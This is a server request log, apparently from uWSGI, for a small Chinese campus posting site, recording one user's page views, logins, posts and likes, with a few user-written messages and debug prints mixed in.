+1月21日有人一起拼车吗 早上8点出发上海火车站 +[pid: 661|app: 0|req: 1922/2410] 180.160.48.43 () {48 vars in 1060 bytes} [Thu Jan 14 12:03:37 2021] POST /publish/ => generated 0 bytes in 33 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1923/2411] 180.160.48.43 () {42 vars in 912 bytes} [Thu Jan 14 12:03:38 2021] GET /single/8 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1924/2412] 180.160.48.43 () {42 vars in 914 bytes} [Thu Jan 14 12:03:38 2021] GET /single/8/ => generated 9164 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1925/2413] 180.160.48.43 () {40 vars in 898 bytes} [Thu Jan 14 12:03:41 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1926/2414] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:03:49 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 661|app: 0|req: 1927/2415] 180.160.48.43 () {40 vars in 891 bytes} [Thu Jan 14 12:03:51 2021] GET /all-3-0-0 => generated 10000 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1928/2416] 180.160.48.43 () {40 vars in 898 bytes} [Thu Jan 14 12:03:53 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1929/2417] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:03:55 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1930/2418] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:04:00 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1931/2419] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:04:01 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 661|app: 0|req: 1932/2420] 180.160.48.43 () {40 vars in 891 bytes} [Thu Jan 14 12:04:02 2021] GET /all-3-0-0 => generated 10000 bytes in 52 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1933/2421] 180.160.48.43 () {40 vars in 898 bytes} [Thu Jan 14 12:04:04 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1934/2422] 180.160.48.43 () {40 vars in 891 bytes} [Thu Jan 14 12:04:20 2021] GET /single/8/ => generated 9164 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1935/2423] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:04:23 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1936/2424] 180.160.48.43 () {40 vars in 891 bytes} [Thu Jan 14 12:04:29 2021] GET /single/2/ => generated 9300 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1937/2425] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:04:37 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1938/2426] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:04:44 2021] GET /ownpublish-0-0-0 => generated 11070 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1939/2427] 180.160.48.43 () {38 vars in 883 bytes} [Thu Jan 14 12:05:00 2021] GET /ownpublish-0-0-0 => generated 9435 bytes in 14 msecs (HTTP/1.1 200) 8 headers in 448 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2428] 180.160.48.43 () {40 vars in 829 bytes} [Thu Jan 14 12:05:00 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2429] 180.160.48.43 () {40 vars in 851 bytes} [Thu Jan 14 12:05:00 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2430] 180.160.48.43 () {38 vars in 771 bytes} [Thu Jan 14 12:05:00 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2431] 180.160.48.43 () {40 vars in 833 bytes} [Thu Jan 14 12:05:00 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2432] 180.160.48.43 () {40 vars in 837 bytes} [Thu Jan 14 12:05:00 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2433] 180.160.48.43 () {40 vars in 812 bytes} [Thu Jan 14 12:05:00 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2434] 180.160.48.43 () {38 vars in 769 bytes} [Thu Jan 14 12:05:00 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2435] 180.160.48.43 () {40 vars in 810 bytes} [Thu Jan 14 12:05:00 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2436] 180.160.48.43 () {40 vars in 828 bytes} [Thu Jan 14 12:05:00 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2437] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 12:05:00 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2438] 180.160.48.43 () {40 vars in 862 bytes} [Thu Jan 14 12:05:00 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1940/2439] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:05:04 2021] GET /ownpublish-0-0-0 => generated 9435 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1941/2440] 180.160.48.43 () {38 vars in 819 bytes} [Thu Jan 14 12:05:09 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2441] 180.160.48.43 () {40 vars in 821 bytes} [Thu Jan 14 12:05:09 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2442] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:05:09 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1942/2443] 180.160.48.43 () {48 vars in 963 bytes} [Thu Jan 14 12:05:14 2021] POST /login/ => generated 82 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1943/2444] 180.160.48.43 () {48 vars in 964 bytes} [Thu Jan 14 12:06:20 2021] POST /login/ => generated 27 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1944/2445] 180.160.48.43 () {40 vars in 911 bytes} [Thu Jan 14 12:06:20 2021] GET /home/ => generated 10104 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2446] 180.160.48.43 () {38 vars in 844 bytes} [Thu Jan 14 12:06:20 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1945/2447] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 12:06:24 2021] GET /all-0-0-0 => generated 12038 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2448] 180.160.48.43 () {38 vars in 840 bytes} [Thu Jan 14 12:06:24 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2449] 180.160.48.43 () {38 vars in 842 bytes} [Thu Jan 14 12:06:24 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +3 +3 +3 +3 +3 +3 +[, , , , , ] +[pid: 661|app: 0|req: 1946/2450] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:06:37 2021] GET /all-0-3-0 => generated 12038 bytes in 27 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +2 +2 +2 +2 +2 +2 +[] +[pid: 661|app: 0|req: 1947/2451] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:06:41 2021] GET /all-0-2-0 => generated 9613 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +3 +3 +3 +3 +3 +3 +[, , , , , ] +[pid: 661|app: 0|req: 1948/2452] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:06:42 2021] GET /all-0-3-0 => generated 12038 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +2 +2 +2 +2 +2 +2 +[] +[pid: 661|app: 0|req: 1949/2453] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:06:43 2021] GET /all-0-2-0 => generated 9613 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +3 +3 +3 +3 +3 +3 +[, , , , , ] +[pid: 661|app: 0|req: 1950/2454] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:06:44 2021] GET /all-0-3-0 => generated 12038 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +3 +3 +3 +3 +3 +3 +[, , , , , ] +[pid: 661|app: 0|req: 1951/2455] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:06:45 2021] GET /all-0-3-1 => generated 12038 bytes in 39 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1952/2456] 180.160.48.43 () {40 vars in 920 bytes} [Thu Jan 14 12:06:49 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1953/2457] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:06:49 2021] GET /single/1/ => generated 9208 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2458] 180.160.48.43 () {38 vars in 826 bytes} [Thu Jan 14 12:06:49 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1954/2459] 180.160.48.43 () {40 vars in 919 bytes} [Thu Jan 14 12:06:53 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1955/2460] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 12:06:53 2021] GET /single/4/ => generated 9187 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2461] 180.160.48.43 () {40 vars in 911 bytes} [Thu Jan 14 12:06:54 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1956/2462] 180.160.48.43 () {40 vars in 919 bytes} [Thu Jan 14 12:07:02 2021] GET /single/6 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1957/2463] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 12:07:02 2021] GET /single/6/ => generated 9192 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[] +[pid: 661|app: 0|req: 1958/2464] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 12:07:12 2021] GET /all-9-3-1 => generated 9613 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1959/2465] 180.160.48.43 () {40 vars in 917 bytes} [Thu Jan 14 12:07:13 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1960/2466] 180.160.48.43 () {40 vars in 919 bytes} [Thu Jan 14 12:07:13 2021] GET /publish/ => generated 5234 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2467] 180.160.48.43 () {38 vars in 827 bytes} [Thu Jan 14 12:08:17 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +表白台上的小姐姐 我宣你 +[pid: 661|app: 0|req: 1961/2468] 180.160.48.43 () {48 vars in 1097 bytes} [Thu Jan 14 12:08:27 2021] POST /publish/ => generated 0 bytes in 23 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1962/2469] 180.160.48.43 () {42 vars in 949 bytes} [Thu Jan 14 12:08:28 2021] GET /single/9 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1963/2470] 180.160.48.43 () {42 vars in 951 bytes} [Thu Jan 14 12:08:28 2021] GET /single/9/ => generated 9131 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1964/2471] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 12:08:34 2021] GET /ownpublish-0-0-0 => generated 10005 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1965/2472] 180.160.48.43 () {48 vars in 1036 bytes} [Thu Jan 14 12:08:36 2021] POST /ownpublish-0-0-0 => generated 27 bytes in 17 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1966/2473] 180.160.48.43 () {40 vars in 943 bytes} [Thu Jan 14 12:08:36 2021] GET /ownpublish-0-0-0 => generated 9512 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1967/2474] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:08:38 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: / +[pid: 661|app: 0|req: 1968/2475] 83.97.20.29 () {26 vars in 279 bytes} [Thu Jan 14 12:08:48 2021] GET / => generated 3429 bytes in 8 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1969/2476] 180.160.48.43 () {42 vars in 934 bytes} [Thu Jan 14 12:11:34 2021] GET /ownpublish-0-0-0 => generated 9488 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2477] 180.160.48.43 () {42 vars in 859 bytes} [Thu Jan 14 12:11:34 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1970/2478] 180.160.48.43 () {40 vars in 892 bytes} [Thu Jan 14 12:11:38 2021] GET /home/ => generated 10080 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2479] 180.160.48.43 () {40 vars in 870 bytes} [Thu Jan 14 12:11:38 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +表白帮我带奶茶的小姐姐! 爱就一个字,我只说亿次 +[pid: 661|app: 0|req: 1971/2480] 180.160.48.43 () {48 vars in 1100 bytes} [Thu Jan 14 12:11:43 2021] POST /publish/ => generated 0 bytes in 46 msecs (HTTP/1.1 302) 7 headers in 203 bytes (4 switches on core 1) +[pid: 661|app: 0|req: 1972/2481] 180.160.48.43 () {42 vars in 952 bytes} [Thu Jan 14 12:11:43 2021] GET /single/10 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1973/2482] 180.160.48.43 () {42 vars in 954 bytes} [Thu Jan 14 12:11:43 2021] GET /single/10/ => generated 9230 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2483] 180.160.48.43 () {38 vars in 845 bytes} [Thu Jan 14 12:11:43 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1974/2484] 180.160.48.43 () {40 vars in 923 bytes} [Thu Jan 14 12:11:53 2021] GET /all-0-0-0 => generated 12456 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2485] 180.160.48.43 () {40 vars in 897 bytes} [Thu Jan 14 12:11:53 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2486] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:11:53 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 1975/2487] 180.160.48.43 () {40 vars in 893 bytes} [Thu Jan 14 12:11:53 2021] GET /single-an-5 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1976/2488] 180.160.48.43 () {40 vars in 895 bytes} [Thu Jan 14 12:11:53 2021] GET /single-an-5/ => generated 3305 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1977/2489] 180.160.48.43 () {40 vars in 914 bytes} [Thu Jan 14 12:11:55 2021] GET /home/ => generated 10104 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 661|app: 0|req: 1978/2490] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 12:12:10 2021] GET /all-5-0-0 => generated 10442 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1979/2491] 180.160.48.43 () {40 vars in 893 bytes} [Thu Jan 14 12:12:11 2021] GET /single-an-1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1980/2492] 180.160.48.43 () {40 vars in 895 bytes} [Thu Jan 14 12:12:12 2021] GET /single-an-1/ => generated 3087 bytes in 5 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1981/2493] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:12:14 2021] GET /all-0-0-0 => generated 12456 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2494] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:12:14 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1982/2495] 180.160.48.43 () {40 vars in 887 bytes} [Thu Jan 14 12:12:18 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1983/2496] 180.160.48.43 () {40 vars in 889 bytes} [Thu Jan 14 12:12:18 2021] GET /single/2/ => generated 9285 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2497] 180.160.48.43 () {38 vars in 799 bytes} [Thu Jan 14 12:12:18 2021] GET /static/img/dianzan.png => generated 2764 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +here +[pid: 661|app: 0|req: 1984/2498] 180.160.48.43 () {48 vars in 976 bytes} [Thu Jan 14 12:12:24 2021] POST /single/2/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1985/2499] 180.160.48.43 () {40 vars in 893 bytes} [Thu Jan 14 12:12:25 2021] GET /single/2/ => generated 9285 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1986/2500] 180.160.48.43 () {40 vars in 920 bytes} [Thu Jan 14 12:12:26 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1987/2501] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:12:26 2021] GET /single/2/ => generated 9309 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1988/2502] 180.160.48.43 () {40 vars in 885 bytes} [Thu Jan 14 12:12:31 2021] GET /home/ => generated 10080 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1989/2503] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:12:33 2021] GET /all-0-0-0 => generated 12456 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2504] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:12:34 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1990/2505] 180.160.48.43 () {40 vars in 936 bytes} [Thu Jan 14 12:12:35 2021] GET /ownpublish-0-0-0 => generated 10046 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1991/2506] 180.160.48.43 () {40 vars in 903 bytes} [Thu Jan 14 12:12:38 2021] GET /ownpublish-0-0-0 => generated 9488 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 1992/2507] 180.160.48.43 () {40 vars in 892 bytes} [Thu Jan 14 12:12:43 2021] GET /home/ => generated 10080 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1993/2508] 180.160.48.43 () {40 vars in 889 bytes} [Thu Jan 14 12:12:45 2021] GET /all-0-0-0 => generated 12432 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2509] 180.160.48.43 () {38 vars in 811 bytes} [Thu Jan 14 12:12:45 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2510] 180.160.48.43 () {38 vars in 813 bytes} [Thu Jan 14 12:12:45 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2511] 180.160.48.43 () {38 vars in 815 bytes} [Thu Jan 14 12:12:45 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1994/2512] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 12:12:50 2021] GET /home/ => generated 10104 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 1995/2513] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 12:12:55 2021] GET /all-0-0-0 => generated 12456 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2514] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:12:55 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 1997/2515] 180.160.48.43 () {38 vars in 863 bytes} [Thu Jan 14 12:13:12 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +[] +[pid: 661|app: 0|req: 1997/2516] 180.160.48.43 () {40 vars in 893 bytes} [Thu Jan 14 12:13:12 2021] GET /all-3-0-0 => generated 9985 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +[] +[pid: 661|app: 0|req: 1998/2517] 180.160.48.43 () {36 vars in 631 bytes} [Thu Jan 14 12:13:26 2021] GET /all-3-0-0 => generated 9932 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2518] 180.160.48.43 () {38 vars in 723 bytes} [Thu Jan 14 12:13:26 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2519] 180.160.48.43 () {38 vars in 718 bytes} [Thu Jan 14 12:13:26 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2520] 180.160.48.43 () {38 vars in 704 bytes} [Thu Jan 14 12:13:26 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2521] 180.160.48.43 () {38 vars in 706 bytes} [Thu Jan 14 12:13:26 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2522] 180.160.48.43 () {38 vars in 722 bytes} [Thu Jan 14 12:13:26 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2523] 180.160.48.43 () {38 vars in 712 bytes} [Thu Jan 14 12:13:26 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2524] 180.160.48.43 () {38 vars in 760 bytes} [Thu Jan 14 12:13:26 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2525] 180.160.48.43 () {38 vars in 727 